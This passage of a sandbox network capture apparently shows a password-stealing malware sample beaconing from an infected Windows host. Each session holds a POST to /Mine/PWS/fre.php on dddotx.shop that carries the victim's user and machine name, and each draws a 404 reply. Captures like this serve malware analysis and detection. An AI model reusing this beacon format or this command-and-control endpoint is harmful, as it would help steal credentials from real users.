Sep 25, 2024 15:30:06.054195881 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v6ZfFuuqcbGJIy5myzTdPY3Z36geDybfSk01menpm5YBWWP6dqKHiJ0JhJvUtPoLERWJZLroIDKEKdo2w1ySh8aJhLCzHrFsQAsDgzHsC8q%2BFCOnJoC0RyLJ9nAxpw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5de92ba16a5e-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	55971	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:06.435375929 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:06.440248966 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:07.461065054 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DU9DYA5QCKYc%2BVWa1Sc4jJXiLEUrjF2utSoe5BEyHg%2FpiYDSpBpp3AgUAQgJscnqhVd2Dp%2FDIhvQzWDm%2FUFNTyI6ZO3%2FJAA33dJmmvvQvnzLTvFu7n5gQLcTpY5n8g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5df0cee81a13-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Sep 25, 2024 15:30:07.461170912 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DU9DYA5QCKYc%2BVWa1Sc4jJXiLEUrjF2utSoe5BEyHg%2FpiYDSpBpp3AgUAQgJscnqhVd2Dp%2FDIhvQzWDm%2FUFNTyI6ZO3%2FJAA33dJmmvvQvnzLTvFu7n5gQLcTpY5n8g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5df0cee81a13-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	55972	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:07.608885050 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:07.613698006 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:08.369697094 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=57t49o0e5MadRYzEM7F5MPbiCyJcF%2FT6i2hbMxNVauazrjTeMgNsL%2Fa07Z64Aq72LAjvACx61F09oLPOP0wqkmQAIlarUsmSu%2FjzCOhvtFC%2Fc5IfRGVfoEup90AOfg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5df81a928c53-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	55973	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:08.515196085 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:08.520224094 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:09.181221962 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fK2RM5PWl1J5HxnKG0eWViQUWiYqlPr3UGl01tZMMi%2BBeNaCHsxH8nIaCWnvnZebEJ0iPXxL%2BIbI0Ng2EdezEIj6e9I8kza8JoKrC3lpff8dZXECN1tYLKO2MhGveQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5dfdbe3042b8-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	55974	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:09.332556009 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:09.339417934 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:10.051428080 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dNHxEu56BqMc%2B0HauuSMY%2BuW%2FD0lLlQxpViBld4mgJxB72bgutf3qKqjcrqqUo83r6etEklbNPACNycFAh2LTNc%2BOpQqGA352yEetfU%2F8BAyoNhmnOCJqgAWVIprbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e02ee2f8ca7-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	55975	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:10.215982914 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:10.220925093 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:10.861635923 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XakXjrUnVeAgqmgC5%2FOfD75JRQ9z7QVKCf26saeaVseH2nnb2qiHcwPNG2zWWFacXWd%2FFHLh%2BZVZ2YGVvs2cvdAZU8PU5Ebe4LUFNOQIMJCtbGAVWkNz3ueQpq%2FL4A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e085b457289-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	55976	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:11.020920038 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:11.026164055 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:12.048547983 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jTYITKKHkauu3KDROcd%2BiPro8JhJ97YcMyYfM3aBEHHZOnkyh2FJVsu%2BwPvelkrGcWgVCVAkAhhnV73QV%2Fo1zdaM3dEumdtCer3J608Ib5jgiY3aLUlac2n1Sfpb3g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e0d6bef0f39-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	55977	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:12.213246107 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:12.218161106 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:12.921641111 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RjMp8iH0DNwHyBAZQS6GAebhWVVFx44WQZ1vNyeLy00TDJwv2eSSXHptCQlsamiKOUUY80Qw1The5UPuAqbOR9VBT%2BMwGrQBWGXwOQfVWkVweU76GLO9nm%2FoiELqig%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e14dccf330c-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	55978	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:13.167393923 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:13.173782110 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:13.838912010 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m1PxUuy2BGXTEkxt9DC5snAPMQ6eOR2yLIr3ecQ%2FQlv2yHHOpP7kujSsPh1X9%2BZS6n9clX1%2FEJvy9LbsJUiIDhxq3hVoU%2BHoKV830jVOPhcl2UMqDSFbKOExq7Q8qg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e1ae8327d1a-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	55979	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:13.988409042 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:13.993422985 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:14.665118933 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cQ51Gmp0eDgLj7ztwEM3HDSYqW5yek9MwLJS70Oev2qyMeHSK81%2Fo68FvqiaEHd6xkza1pnG%2B6%2F4hNruuSII5ZukMevtzLW4pk4tfPyk%2BSwmhOLGGtcvyv9Gk5NVAQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e1ffbd6c443-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	55980	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:14.834512949 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:14.842546940 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:15.525509119 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g34fbR2gKMzgdlcFVB4ONhC4jVCb79W9gEKBhireFB%2FvgYCOno7mxvPguLY40M5EzTuQQYsBfHVFIR6ms8eNEbhmVnKj2PIJ3iP%2B2ojO1O5YgfN9Ctk12DY1SEcTIQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e254d7542fc-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	55981	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:15.686281919 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:15.691270113 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:16.351320982 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oku57ku%2ByhJ4L4Zy2FXfxr0sbjlHCxj0gmtVxqb4yHalViOhEE0Vv9UfFE%2FDmgkMagKtL6%2BIVqFNVcMDD6H1%2FWSovzXyOVJcilbXgspbTRT6hbZoAIrT0XSJei7FHA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e2a89394396-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	55982	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:16.545212030 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:16.551798105 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:17.329895020 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O5BC95%2FKCnA29OJK8ckki9PlYQ2A2Q6eVH3bHNTfaqUZPqyi7nf6a9TYlcg%2FDSS%2B2BdQMB5oGYV9ALGSJR1O0h%2BLajNhJyW4HrKzPM%2B8l6vqUgsUKhpZFkrib30E5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e2ff84872a1-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	55983	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:17.492960930 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:17.497859955 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:18.191195965 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7RreTgmB4WA%2FmyEd44IMkIL7CV25qUh59a7dPeDaZh8T%2Fl6Oeil8k03ANkZCzPykUZAC4SzsK6WEpONZXC5xpHOdShTdO73zmVd1J9VQTtWN1I5w24ZGWVCCNtbEuw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e35ded941fb-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	55984	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:18.358325958 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:30:18.363198042 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:30:19.039804935 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:30:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FTHGSZSAC5ZMaC%2FlEVWQj4QqZjh8h%2FoxLIxIjVxPM1uhMvmcxXs%2FryvjtXTbYlItwxrm9%2BdXLiVG%2FLlLfoeLDhqlTFeJXVDa1ZQeBv%2BmVxT250H1Ch6YQ0ryAScoCw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5e3b3b098c0c-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	55985	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:30:19.194960117 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
